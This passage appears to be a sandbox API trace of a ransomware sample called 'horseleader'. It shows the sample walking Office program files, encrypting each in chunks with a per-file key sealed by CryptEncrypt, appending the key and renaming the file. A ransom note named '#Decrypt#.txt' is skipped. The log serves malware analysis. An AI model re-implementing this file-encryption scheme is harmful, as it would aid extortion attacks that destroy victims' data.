lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.138] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.139] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x6eb60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.139] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.142] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.142] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.142] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.143] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.143] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.143] CloseHandle (hObject=0x158) returned 1 [0244.143] GetProcessHeap () returned 0x780000 [0244.143] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.144] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE.horseleader") returned 84 [0244.144] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoicons.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOICONS.EXE.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoicons.exe.horseleader")) returned 1 [0244.145] GetProcessHeap () returned 0x780000 [0244.145] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.145] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5e15000, ftCreationTime.dwHighDateTime=0x1cbf3e5, ftLastAccessTime.dwLowDateTime=0xec32f3e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xe5e15000, ftLastWriteTime.dwHighDateTime=0x1cbf3e5, nFileSizeHigh=0x0, nFileSizeLow=0x4529780, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSORES.DLL", cAlternateFileName="")) returned 1 [0244.145] lstrcmpiW (lpString1="MSORES.DLL", lpString2="Windows") returned -1 [0244.145] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL") returned 70 [0244.146] StrStrIW (lpFirst="MSORES.DLL", lpSrch=".horseleader") returned 0x0 [0244.146] lstrcmpW (lpString1="MSORES.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.146] lstrcmpW (lpString1="MSORES.DLL", lpString2="_uninstalling_.png") returned 1 [0244.146] lstrlenW (lpString=".testttjffg") returned 11 [0244.146] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL", lpSrch=".testttjffg") returned 0x0 [0244.146] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.146] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.146] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.147] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL") returned 70 [0244.147] StrStrW (lpFirst="MSORES.DLL", lpSrch=".txt") returned 0x0 [0244.147] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=72521600) returned 1 [0244.147] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.148] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.157] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.157] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.158] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x22923c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.158] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.160] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.160] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.161] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x4524780, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.161] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.164] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.164] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.164] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.164] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.164] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.164] CloseHandle (hObject=0x158) returned 1 [0244.165] GetProcessHeap () returned 0x780000 [0244.165] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.165] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL.horseleader") returned 82 [0244.165] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll.horseleader")) returned 1 [0244.166] GetProcessHeap () returned 0x780000 [0244.166] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.166] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4293d00, ftCreationTime.dwHighDateTime=0x1cbc468, ftLastAccessTime.dwLowDateTime=0xd77dddc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa4293d00, ftLastWriteTime.dwHighDateTime=0x1cbc468, nFileSizeHigh=0x0, nFileSizeLow=0x135f90, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msoshext.dll", cAlternateFileName="")) returned 1 [0244.166] lstrcmpiW (lpString1="msoshext.dll", lpString2="Windows") returned -1 [0244.166] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll") returned 72 [0244.167] StrStrIW (lpFirst="msoshext.dll", lpSrch=".horseleader") returned 0x0 [0244.167] lstrcmpW (lpString1="msoshext.dll", lpString2="#Decrypt#.txt") returned 1 [0244.167] lstrcmpW (lpString1="msoshext.dll", lpString2="_uninstalling_.png") returned 1 [0244.167] lstrlenW (lpString=".testttjffg") returned 11 [0244.167] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll", lpSrch=".testttjffg") returned 0x0 [0244.167] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.167] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.167] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoshext.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.168] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll") returned 72 [0244.168] StrStrW (lpFirst="msoshext.dll", lpSrch=".txt") returned 0x0 [0244.168] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1269648) returned 1 [0244.168] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.168] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.172] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.173] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.173] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x987c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.173] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.181] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.181] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.181] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x130f90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.181] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.193] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.193] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.193] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.193] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.193] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.193] CloseHandle (hObject=0x158) returned 1 [0244.194] GetProcessHeap () returned 0x780000 [0244.194] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.194] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll.horseleader") returned 84 [0244.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoshext.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoshext.dll.horseleader")) returned 1 [0244.196] GetProcessHeap () returned 0x780000 [0244.196] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.196] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc276d800, ftCreationTime.dwHighDateTime=0x1cab8aa, ftLastAccessTime.dwLowDateTime=0x6a050eb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc276d800, ftLastWriteTime.dwHighDateTime=0x1cab8aa, nFileSizeHigh=0x0, nFileSizeLow=0xdb50, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSOXEV.DLL", cAlternateFileName="")) returned 1 [0244.196] lstrcmpiW (lpString1="MSOXEV.DLL", lpString2="Windows") returned -1 [0244.196] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL") returned 70 [0244.196] StrStrIW (lpFirst="MSOXEV.DLL", lpSrch=".horseleader") returned 0x0 [0244.196] lstrcmpW (lpString1="MSOXEV.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.196] lstrcmpW (lpString1="MSOXEV.DLL", lpString2="_uninstalling_.png") returned 1 [0244.196] lstrlenW (lpString=".testttjffg") returned 11 [0244.196] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL", lpSrch=".testttjffg") returned 0x0 [0244.196] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.196] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.197] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxev.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.198] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL") returned 70 [0244.198] StrStrW (lpFirst="MSOXEV.DLL", lpSrch=".txt") returned 0x0 [0244.198] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=56144) returned 1 [0244.198] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.201] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.201] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.202] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.202] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.202] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.202] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3b50, lpOverlapped=0x0) returned 1 [0244.203] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc4b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.203] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3b50, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3b50, lpOverlapped=0x0) returned 1 [0244.203] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.203] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.203] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.203] CloseHandle (hObject=0x158) returned 1 [0244.203] GetProcessHeap () returned 0x780000 [0244.203] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.204] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL.horseleader") returned 82 [0244.204] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxev.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxev.dll.horseleader")) returned 1 [0244.205] GetProcessHeap () returned 0x780000 [0244.205] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.205] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553f4600, ftCreationTime.dwHighDateTime=0x1cab7c9, ftLastAccessTime.dwLowDateTime=0x593ede30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x553f4600, ftLastWriteTime.dwHighDateTime=0x1cab7c9, nFileSizeHigh=0x0, nFileSizeLow=0x1d950, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSOXMLED.EXE", cAlternateFileName="")) returned 1 [0244.205] lstrcmpiW (lpString1="MSOXMLED.EXE", lpString2="Windows") returned -1 [0244.205] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE") returned 72 [0244.205] StrStrIW (lpFirst="MSOXMLED.EXE", lpSrch=".horseleader") returned 0x0 [0244.205] lstrcmpW (lpString1="MSOXMLED.EXE", lpString2="#Decrypt#.txt") returned 1 [0244.205] lstrcmpW (lpString1="MSOXMLED.EXE", lpString2="_uninstalling_.png") returned 1 [0244.205] lstrlenW (lpString=".testttjffg") returned 11 [0244.205] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE", lpSrch=".testttjffg") returned 0x0 [0244.205] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.205] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.205] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmled.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.206] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE") returned 72 [0244.206] StrStrW (lpFirst="MSOXMLED.EXE", lpSrch=".txt") returned 0x0 [0244.206] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=121168) returned 1 [0244.206] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.206] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.210] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.210] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.210] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xc4a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.210] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.210] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.211] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.211] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x18950, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 